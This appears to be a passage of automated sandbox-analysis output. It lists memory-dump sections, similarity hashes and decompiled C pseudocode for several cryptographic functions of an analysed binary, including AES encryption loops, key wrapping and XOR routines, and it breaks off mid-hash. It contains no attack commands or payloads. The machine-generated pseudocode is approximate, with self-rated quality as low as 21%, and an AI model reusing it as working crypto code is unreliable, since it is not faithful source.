                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eea724a56ad65be1b6ae2f72a3b0d31ca73629a16ad078eb2596b2bf2c1ef7ca
                                                              • Instruction ID: 66f07d2e5a58aedba68a5329f7bb3953af6168b0244437a4d4297aa2af6175bb
                                                              • Opcode Fuzzy Hash: eea724a56ad65be1b6ae2f72a3b0d31ca73629a16ad078eb2596b2bf2c1ef7ca
                                                              • Instruction Fuzzy Hash: 63311271A193019FC304DF69C980A6BFBE4EFC9314F908A6EF49997211D770E909CB82
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA4080, Relevance: .1, Instructions: 101COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 54%
                                                              			E00BA4080(intOrPtr __ebx, intOrPtr __esi, void* __ebp, intOrPtr _a4, intOrPtr* _a8, char _a12, signed int _a16, signed int _a17, signed int _a18, signed int _a19, intOrPtr _a20, intOrPtr _a24, signed int _a28, intOrPtr _a36, intOrPtr* _a40, intOrPtr* _a44, intOrPtr _a48, signed char _a52, intOrPtr _a56) {
				char _v0;
				void* __edi;
				signed int _t48;
				signed char _t51;
				intOrPtr* _t55;
				signed char _t56;
				unsigned int _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				char* _t81;
				intOrPtr* _t86;
				void* _t89;
				intOrPtr* _t91;
				intOrPtr _t92;
				intOrPtr _t94;
				signed int _t95;
				signed int _t97;

				_t90 = __esi;
				_t64 = __ebx;
				E00C6BB10(0x20);
				_t48 =  *0xcc5970; // 0x851ab4dd
				_a28 = _t48 ^ _t95;
				_t67 = _a48;
				_t94 = _a36;
				_a4 = _a56;
				_t51 = _a52;
				_t86 = _a44;
				_a8 = _t86;
				if((_t51 & 0x00000007) != 0) {
					L13:
					return E00C69C26(0, _t64, _a28 ^ _t95, _t78, _t86, _t90);
				} else {
					_t78 = _t51 - 0x10;
					if(_t51 - 0x10 > 0x7ffffff0) {
						goto L13;
					} else {
						_push(__ebx);
						_push(__esi);
						_t65 = 1;
						E00C6BBC0(1, _t86, __esi, _t86 + 8, _t67, _t51);
						_t55 = _a40;
						_t97 = _t95 + 0xc;
						if(_t55 == 0) {
							_t55 = 0xc81934;
						}
						_t14 = _t55 + 4; // 0xa6a6a6a6
						_a12 =  *_t55;
						_a16 =  *_t14;
						_v0 = 6;
						do {
							_t56 = _a52;
							_t91 = _t86 + 8;
							if(_t56 > 0) {
								_t89 = (_t56 - 1 >> 3) + 1;
								do {
									_t81 =  &_a12;
									_a20 =  *_t91;
									_a24 =  *((intOrPtr*)(_t91 + 4));
									_a4(_t81, _t81, _t94);
									_a19 = _a19 ^ _t65;
									_t97 = _t97 + 0xc;
									if(_t65 > 0xff) {
										_a18 = _a18 ^ _t65 >> 0x00000008;
										_a17 = _a17 ^ _t65 >> 0x00000010;
										_a16 = _a16 ^ _t65 >> 0x00000018;
									}
									 *_t91 = _a20;
									 *((intOrPtr*)(_t91 + 4)) = _a24;
									_t65 = _t65 + 1;
									_t91 = _t91 + 8;
									_t89 = _t89 - 1;
								} while (_t89 != 0);
								_t56 = _a52;
								_t86 = _a8;
							}
							_t39 =  &_v0;
							 *_t39 = _v0 - 1;
						} while ( *_t39 != 0);
						_pop(_t92);
						_pop(_t66);
						 *_t86 = _a12;
						 *((intOrPtr*)(_t86 + 4)) = _a16;
						return E00C69C26(_t56 + 8, _t66, _a28 ^ _t97, _a16, _t86, _t92);
					}
				}
			}




















                                                              0x00ba4080
                                                              0x00ba4080
                                                              0x00ba4085
                                                              0x00ba408a
                                                              0x00ba4091
                                                              0x00ba4099
                                                              0x00ba409e
                                                              0x00ba40a2
                                                              0x00ba40a6
                                                              0x00ba40ab
                                                              0x00ba40af
                                                              0x00ba40b5
                                                              0x00ba419f
                                                              0x00ba41b1
                                                              0x00ba40bb
                                                              0x00ba40bb
                                                              0x00ba40c4
                                                              0x00000000
                                                              0x00ba40ca
                                                              0x00ba40ca
                                                              0x00ba40cb
                                                              0x00ba40d2
                                                              0x00ba40d7
                                                              0x00ba40dc
                                                              0x00ba40e0
                                                              0x00ba40e5
                                                              0x00ba40e7
                                                              0x00ba40e7
                                                              0x00ba40ee
                                                              0x00ba40f1
                                                              0x00ba40f5
                                                              0x00ba40f9
                                                              0x00ba4101
                                                              0x00ba4101
                                                              0x00ba4105
                                                              0x00ba410a
                                                              0x00ba4112
                                                              0x00ba4113
                                                              0x00ba4118
                                                              0x00ba411d
                                                              0x00ba4125
                                                              0x00ba4129
                                                              0x00ba412d
                                                              0x00ba4131
                                                              0x00ba413a
                                                              0x00ba4143
                                                              0x00ba414a
                                                              0x00ba4153
                                                              0x00ba4153
                                                              0x00ba415f
                                                              0x00ba4161
                                                              0x00ba4164
                                                              0x00ba4165
                                                              0x00ba4168
                                                              0x00ba4168
                                                              0x00ba416d
                                                              0x00ba4171
                                                              0x00ba4171
                                                              0x00ba4175
                                                              0x00ba4175
                                                              0x00ba4175
                                                              0x00ba4184
                                                              0x00ba4185
                                                              0x00ba4186
                                                              0x00ba4188
                                                              0x00ba419e
                                                              0x00ba419e
                                                              0x00ba40c4

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9f81930e91149e6f63516e190ec2ed1ccb1189bad93cce3e385b74c91e0a232c
                                                              • Instruction ID: d6418c67f2d93b704a0a65130ee17ecdba6479c1397ac2b84c295e8d5c29b800
                                                              • Opcode Fuzzy Hash: 9f81930e91149e6f63516e190ec2ed1ccb1189bad93cce3e385b74c91e0a232c
                                                              • Instruction Fuzzy Hash: CB3120716083419FC314CF29C981A6AFBE5EFC9318F848A2DF89997341D771E949CB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9E1E0, Relevance: .1, Instructions: 87COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 61%
                                                              			E00B9E1E0(void* __ebp, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28, signed int _a32, intOrPtr* _a40, intOrPtr _a44, intOrPtr _a48) {
				signed int _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				signed int _t48;
				signed int _t54;
				intOrPtr _t59;
				signed int _t61;
				intOrPtr _t69;
				signed int _t75;
				signed int _t85;
				intOrPtr* _t86;
				signed int _t90;
				signed int _t91;

				E00C6BB10(0x24);
				_t45 =  *0xcc5970; // 0x851ab4dd
				_a32 = _t45 ^ _t90;
				_t59 = _a44;
				_t86 = _a40;
				_t48 =  *(_t86 + 0x98) ^  *(_t86 + 0x88);
				_t61 =  *(_t86 + 0x9c) ^  *(_t86 + 0x8c);
				_t75 =  *(_t86 + 0xa0) ^  *(_t86 + 0x90);
				_v0 = _t48;
				_t85 =  *(_t86 + 0xa4) ^  *(_t86 + 0x94);
				_a4 = _t61;
				_a8 = _t75;
				_a20 =  *(_t86 + 0x34) ^ _t61;
				_a24 =  *(_t86 + 0x38) ^ _t75;
				_a28 =  *(_t86 + 0x3c) ^ _t85;
				_a12 = _t85;
				_a16 =  *(_t86 + 0x30) ^ _t48;
				 *((intOrPtr*)( *_t86))( &_a16,  &_v0,  *((intOrPtr*)(_t86 + 8)));
				_t31 = _t86 + 0x58; // 0x250
				_t54 = _t31;
				 *_t54 =  *(_t86 + 0x78) ^ _v0;
				 *(_t54 + 4) =  *(_t86 + 0x7c) ^ _a4;
				 *(_t86 + 0x60) =  *(_t86 + 0x80) ^ _a8;
				_t69 = _a48;
				 *(_t86 + 0x64) =  *(_t86 + 0x84) ^ _a12;
				_t83 = _t69 - 1;
				_t91 = _t90 + 0xc;
				if(_t69 - 1 > 0xf || _t59 == 0) {
					return E00C69C26(_t54 | 0xffffffff, _t59, _a32 ^ _t91, _t83, _t85, _t86);
				} else {
					return E00C69C26(E00BA3A50(_t54, _t59, _t69), _t59, _a32 ^ _t91 + 0x0000000c, _t83, _t85, _t86);
				}
			}


















                                                              0x00b9e1e5
                                                              0x00b9e1ea
                                                              0x00b9e1f1
                                                              0x00b9e1f6
                                                              0x00b9e1fc
                                                              0x00b9e206
                                                              0x00b9e212
                                                              0x00b9e221
                                                              0x00b9e229
                                                              0x00b9e239
                                                              0x00b9e23f
                                                              0x00b9e248
                                                              0x00b9e24f
                                                              0x00b9e25b
                                                              0x00b9e263
                                                              0x00b9e26d
                                                              0x00b9e271
                                                              0x00b9e275
                                                              0x00b9e285
                                                              0x00b9e285
                                                              0x00b9e288
                                                              0x00b9e294
                                                              0x00b9e2a1
                                                              0x00b9e2a4
                                                              0x00b9e2a8
                                                              0x00b9e2ab
                                                              0x00b9e2ae
                                                              0x00b9e2b4
                                                              0x00b9e2ed
                                                              0x00b9e2ba
                                                              0x00b9e2d7
                                                              0x00b9e2d7

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 743d5ecbe701c145b6104afbb7c157e4a7f19d1701aaf7830fb5b311badf5c79
                                                              • Instruction ID: c0eda6b18ee838bd8ad823542b88340d4333c1f9401a463ed64ce22926158261
                                                              • Opcode Fuzzy Hash: 743d5ecbe701c145b6104afbb7c157e4a7f19d1701aaf7830fb5b311badf5c79
                                                              • Instruction Fuzzy Hash: 223114B5608B009FD318CF2AC581A6BF7E5FFCC314F818A2EE59A87650D630B945CB52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B99030, Relevance: .1, Instructions: 80COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 21%
                                                              			E00B99030(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, void* _a20, void* _a24) {
				intOrPtr _v28;
				void* _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _t22;
				void* _t26;
				void* _t30;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t39;

				_t35 = _a4;
				_t33 = _a8;
				_t22 = _a12;
				_v28 = _t39;
				asm("movdqu xmm7, [ebx]");
				asm("movdqu xmm3, [ecx]");
				 *(_t39 - 0x0000003c & 0xfffffff0) = 0xc0d0e0f;
				_v72 = 0x8090a0b;
				_v68 = 0x4050607;
				_v64 = 0x10203;
				_v60 = 1;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				asm("movdqa xmm5, [esp]");
				asm("movdqa xmm2, xmm7");
				_t26 = 0x10 - ( *(_a16 + 0xf0) << 4);
				asm("pshufb xmm7, xmm5");
				do {
					asm("movups xmm0, [ebp]");
					_t30 = _t26;
					asm("movups xmm6, [esi]");
					asm("xorps xmm2, xmm0");
					asm("movups xmm1, [ebp+0x10]");
					asm("xorps xmm0, xmm6");
					asm("xorps xmm3, xmm0");
					asm("movups xmm0, [ebp+0x20]");
					do {
						asm("aesenc xmm2, xmm1");
						asm("aesenc xmm3, xmm1");
						asm("movups xmm1, [edx+ecx]");
						_t30 = _t30 + 0x20;
						asm("aesenc xmm2, xmm0");
						asm("aesenc xmm3, xmm0");
						asm("movups xmm0, [edx+ecx-0x10]");
					} while (_t30 != 0);
					asm("aesenc xmm2, xmm1");
					asm("aesenc xmm3, xmm1");
					asm("paddq xmm7, [esp+0x10]");
					_t22 = _t22 - 1;
					asm("aesenclast xmm2, xmm0");
					asm("aesenclast xmm3, xmm0");
					_t35 = _t35 + 0x10;
					asm("xorps xmm6, xmm2");
					asm("movdqa xmm2, xmm7");
					asm("movups [edi], xmm6");
					asm("pshufb xmm2, xmm5");
					_t33 = _t33 + 0x10;
				} while (_t22 != 0);
				asm("movups [edi], xmm3");
				asm("pxor xmm0, xmm0");
				asm("pxor xmm1, xmm1");
				asm("pxor xmm2, xmm2");
				asm("pxor xmm3, xmm3");
				asm("pxor xmm4, xmm4");
				asm("pxor xmm5, xmm5");
				asm("pxor xmm6, xmm6");
				asm("pxor xmm7, xmm7");
				return _t22;
			}


















                                                              0x00b99034
                                                              0x00b99038
                                                              0x00b9903c
                                                              0x00b99054
                                                              0x00b99058
                                                              0x00b9905c
                                                              0x00b99066
                                                              0x00b9906d
                                                              0x00b99075
                                                              0x00b9907d
                                                              0x00b9908c
                                                              0x00b99090
                                                              0x00b99094
                                                              0x00b99098
                                                              0x00b990a6
                                                              0x00b990ab
                                                              0x00b990b3
                                                              0x00b990b5
                                                              0x00b990ba
                                                              0x00b990ba
                                                              0x00b990be
                                                              0x00b990c0
                                                              0x00b990c3
                                                              0x00b990c6
                                                              0x00b990ca
                                                              0x00b990cd
                                                              0x00b990d0
                                                              0x00b990d4
                                                              0x00b990d4
                                                              0x00b990d9
                                                              0x00b990de
                                                              0x00b990e2
                                                              0x00b990e5
                                                              0x00b990ea
                                                              0x00b990ef
                                                              0x00b990ef
                                                              0x00b990fa
                                                              0x00b990ff
                                                              0x00b99104
                                                              0x00b9910a
                                                              0x00b9910b
                                                              0x00b99110
                                                              0x00b99115
                                                              0x00b99118
                                                              0x00b9911b
                                                              0x00b9911f
                                                              0x00b99122
                                                              0x00b99127
                                                              0x00b99127
                                                              0x00b99138
                                                              0x00b9913b
                                                              0x00b9913f
                                                              0x00b99143
                                                              0x00b99147
                                                              0x00b9914b
                                                              0x00b9914f
                                                              0x00b99153
                                                              0x00b99157
                                                              0x00b9915f

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60a23c78da3b6716c584f250082441a8c334e7b2b212062c327525d921f6641d
                                                              • Instruction ID: 11a11b0b8a9d6b73d8de5a07021b4acfaf8f50bb3cad6f4e11f6a9709c1b5ad6
                                                              • Opcode Fuzzy Hash: 60a23c78da3b6716c584f250082441a8c334e7b2b212062c327525d921f6641d
                                                              • Instruction Fuzzy Hash: 7E316C3480CB9A97D7029F39C441566F7A0BFAA258F00CB1EED9433661D771BA84AA52
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA2100, Relevance: .1, Instructions: 77COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 44%
                                                              			E00BA2100(signed int __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t3;
				void* _t4;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t20;
				void* _t21;
				void* _t26;
				void* _t28;
				void* _t34;

				_t28 = __edi;
				_t26 = __edx;
				_t25 = __ecx;
				asm("movdqu xmm0, [esi]");
				asm("movdqa xmm2, [ebp+0x140]");
				asm("movdqa xmm3, xmm0");
				asm("movdqa [esp+0x4], xmm2");
				_t4 = E00BA2370(_t3);
				asm("movdqa xmm7, xmm0");
				if(__edi != 0) {
					asm("movdqa xmm1, [ebp+ecx+0x100]");
					asm("pshufb xmm3, xmm1");
					asm("movdqu [edx], xmm3");
					_t25 = __ecx ^ 0x00000030;
				} else {
					asm("movdqu [edx], xmm0");
				}
				_t34 = _t4 - 0xc0;
				if(_t34 > 0) {
					asm("movdqu xmm0, [esi+0x10]");
					E00BA2370(_t4);
					_t6 = 7;
					while(1) {
						_t7 = E00BA23A0(_t6, _t25, _t26, _t28);
						asm("movdqa xmm6, xmm0");
						_t8 = E00BA22A0(_t7);
						_t9 = _t8 == 1;
						if(_t8 == 1) {
							goto L14;
						}
						_t11 = E00BA23A0(_t9, _t25, _t26, _t28);
						asm("pshufd xmm0, xmm0, 0xff");
						asm("movdqa [esp+0x14], xmm7");
						asm("movdqa xmm7, xmm6");
						_t6 = E00BA22CB(_t11);
						asm("movdqa xmm7, [esp+0x14]");
					}
				} else {
					if(_t34 == 0) {
						asm("movdqu xmm0, [esi+0x8]");
						E00BA2370(_t4);
						asm("movdqa xmm6, xmm0");
						asm("pxor xmm4, xmm4");
						asm("movhlps xmm6, xmm4");
						_t13 = 4;
						while(1) {
							_t14 = E00BA22A0(_t13);
							asm("palignr xmm0, xmm6, 0x8");
							_t18 = E00BA22A0(E00BA23A0(E00BA2280(E00BA23A0(_t14, _t25, _t26, _t28)), _t25, _t26, _t28));
							_t9 = _t18 == 1;
							if(_t18 == 1) {
								goto L14;
							}
							_t13 = E00BA2280(E00BA23A0(_t9, _t25, _t26, _t28));
						}
					} else {
						_t20 = 0xa;
						while(1) {
							_t21 = E00BA22A0(_t20);
							_t9 = _t21 == 1;
							if(_t21 == 1) {
								goto L14;
							}
							_t20 = E00BA23A0(_t9, _t25, _t26, _t28);
						}
					}
				}
				L14:
				if(_t28 == 0) {
					asm("movdqa xmm1, [ebp+ecx+0x100]");
					asm("pshufb xmm0, xmm1");
					_t26 = _t26 + 0x20;
				}
				asm("pxor xmm0, [ebp+0x150]");
				_t10 = E00BA2370(_t9);
				asm("movdqu [edx], xmm0");
				asm("pxor xmm0, xmm0");
				asm("pxor xmm1, xmm1");
				asm("pxor xmm2, xmm2");
				asm("pxor xmm3, xmm3");
				asm("pxor xmm4, xmm4");
				asm("pxor xmm5, xmm5");
				asm("pxor xmm6, xmm6");
				asm("pxor xmm7, xmm7");
				return _t10;
			}


















                                                              0x00ba2100
                                                              0x00ba2100
                                                              0x00ba2100
                                                              0x00ba2103
                                                              0x00ba2107
                                                              0x00ba210f
                                                              0x00ba2116
                                                              0x00ba211c
                                                              0x00ba2121
                                                              0x00ba2127
                                                              0x00ba2136
                                                              0x00ba213f
                                                              0x00ba2144
                                                              0x00ba2148
                                                              0x00ba212d
                                                              0x00ba212d
                                                              0x00ba212d
                                                              0x00ba214b
                                                              0x00ba2150
                                                              0x00ba21d0
                                                              0x00ba21d5
                                                              0x00ba21da
                                                              0x00ba21df
                                                              0x00ba21df
                                                              0x00ba21e4
                                                              0x00ba21e8
                                                              0x00ba21ed
                                                              0x00ba21ee
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba21f4
                                                              0x00ba21f9
                                                              0x00ba21fe
                                                              0x00ba2204
                                                              0x00ba2208
                                                              0x00ba220d
                                                              0x00ba220d
                                                              0x00ba2156
                                                              0x00ba2156
                                                              0x00ba2180
                                                              0x00ba2185
                                                              0x00ba218a
                                                              0x00ba218e
                                                              0x00ba2192
                                                              0x00ba2195
                                                              0x00ba219a
                                                              0x00ba219a
                                                              0x00ba219f
                                                              0x00ba21b4
                                                              0x00ba21b9
                                                              0x00ba21ba
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba21c5
                                                              0x00ba21c5
                                                              0x00ba215c
                                                              0x00ba215c
                                                              0x00ba2161
                                                              0x00ba2161
                                                              0x00ba2166
                                                              0x00ba2167
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba216d
                                                              0x00ba216d
                                                              0x00ba2161
                                                              0x00ba2156
                                                              0x00ba2220
                                                              0x00ba2228
                                                              0x00ba222e
                                                              0x00ba2237
                                                              0x00ba2242
                                                              0x00ba2242
                                                              0x00ba2248
                                                              0x00ba2250
                                                              0x00ba2255
                                                              0x00ba2259
                                                              0x00ba225d
                                                              0x00ba2261
                                                              0x00ba2265
                                                              0x00ba2269
                                                              0x00ba226d
                                                              0x00ba2271
                                                              0x00ba2275
                                                              0x00ba2279

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1bd6ee22b8be88284ea3de3379d93d189bee9a2acde73ad58f94725c0800f69d
                                                              • Instruction ID: b28751517a9b203404f6808d220ff6156eb80ed8b5f3d0adcd71a78ba307e089
                                                              • Opcode Fuzzy Hash: 1bd6ee22b8be88284ea3de3379d93d189bee9a2acde73ad58f94725c0800f69d
                                                              • Instruction Fuzzy Hash: 38216F24C0CF4985EB136B7C98433AAA3E0AFE7340F50D396F9D439D52EB2547846215
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9CA70, Relevance: .1, Instructions: 71COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 32%
                                                              			E00B9CA70() {
				signed char* _t28;
				signed char _t36;
				unsigned int _t41;
				void* _t45;
				signed int* _t46;
				signed char* _t48;
				void* _t49;
				signed int* _t50;
				void* _t52;
				void* _t53;

				_t36 =  *(_t52 + 0x10);
				_t48 =  *(_t52 + 0xc);
				_t3 =  &(_t48[0x28]); // 0x50560000
				_t28 =  *_t3;
				 *(_t52 + 0xc) = _t28;
				if(_t36 != 0) {
					_t5 =  &(_t48[0x2c]); // 0x8edae8
					 *_t48 =  *_t48 | 0x00000040;
					_t6 =  &(_t48[0x10]); // 0xb940e5
					_t46 = _t6;
					 *_t28(_t48, _t46,  *_t5, _t45, _t49);
					_t53 = _t52 + 0xc;
					_t48[0x20] = _t48[0x20] + 1;
					_t41 = _t36;
					asm("adc dword [esi+0x24], 0x0");
					if(_t36 >= 0xff00) {
						_t48[0x11] = _t48[0x11] ^ 0x000000fe;
						 *_t46 =  !( *_t46);
						_t48[0x14] = _t48[0x14] ^ _t36 >> 0x00000008;
						_t48[0x12] = _t48[0x12] ^ _t36 >> 0x00000018;
						_t48[0x13] = _t48[0x13] ^ _t41 >> 0x00000010;
						_t48[0x15] = _t48[0x15] ^ _t36;
						_t34 = 6;
					} else {
						 *_t46 =  *_t46 ^ _t41 >> 0x00000008;
						_t48[0x11] = _t48[0x11] ^ _t36;
						_t34 = 2;
					}
					_t50 =  *(_t53 + 0x18);
					do {
						if(_t34 >= 0x10) {
							goto L8;
						}
						while(_t36 != 0) {
							 *(_t46 + _t34) =  *(_t46 + _t34) ^  *_t50;
							_t34 = _t34 + 1;
							_t50 =  &(_t50[0]);
							_t36 = _t36 - 1;
							if(_t34 < 0x10) {
								continue;
							}
							goto L8;
						}
						L8:
						_t24 =  &(_t48[0x2c]); // 0x8edae8
						 *((intOrPtr*)(_t53 + 0x20))(_t46, _t46,  *_t24);
						_t53 = _t53 + 0xc;
						_t48[0x20] = _t48[0x20] + 1;
						_t34 = 0;
						asm("adc [esi+0x24], eax");
					} while (_t36 != 0);
					return 0;
				}
				return _t28;
			}













                                                              0x00b9ca71
                                                              0x00b9ca76
                                                              0x00b9ca7a
                                                              0x00b9ca7a
                                                              0x00b9ca7d
                                                              0x00b9ca83
                                                              0x00b9ca89
                                                              0x00b9ca8c
                                                              0x00b9ca92
                                                              0x00b9ca92
                                                              0x00b9ca97
                                                              0x00b9ca99
                                                              0x00b9ca9c
                                                              0x00b9caa0
                                                              0x00b9caa2
                                                              0x00b9caac
                                                              0x00b9cabf
                                                              0x00b9cac5
                                                              0x00b9cace
                                                              0x00b9cad4
                                                              0x00b9cada
                                                              0x00b9cadd
                                                              0x00b9cae0
                                                              0x00b9caae
                                                              0x00b9cab1
                                                              0x00b9cab3
                                                              0x00b9cab6
                                                              0x00b9cab6
                                                              0x00b9cae5
                                                              0x00b9caf0
                                                              0x00b9caf3
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9caf5
                                                              0x00b9cafc
                                                              0x00b9caff
                                                              0x00b9cb00
                                                              0x00b9cb01
                                                              0x00b9cb05
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9cb05
                                                              0x00b9cb07
                                                              0x00b9cb07
                                                              0x00b9cb0d
                                                              0x00b9cb11
                                                              0x00b9cb14
                                                              0x00b9cb18
                                                              0x00b9cb1d
                                                              0x00b9cb20
                                                              0x00000000
                                                              0x00b9cb25
                                                              0x00b9cb28

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aec08d149ecfa6be2b40e01b4dc94bad01a90ea383ffb5275a71a76fa15f278e
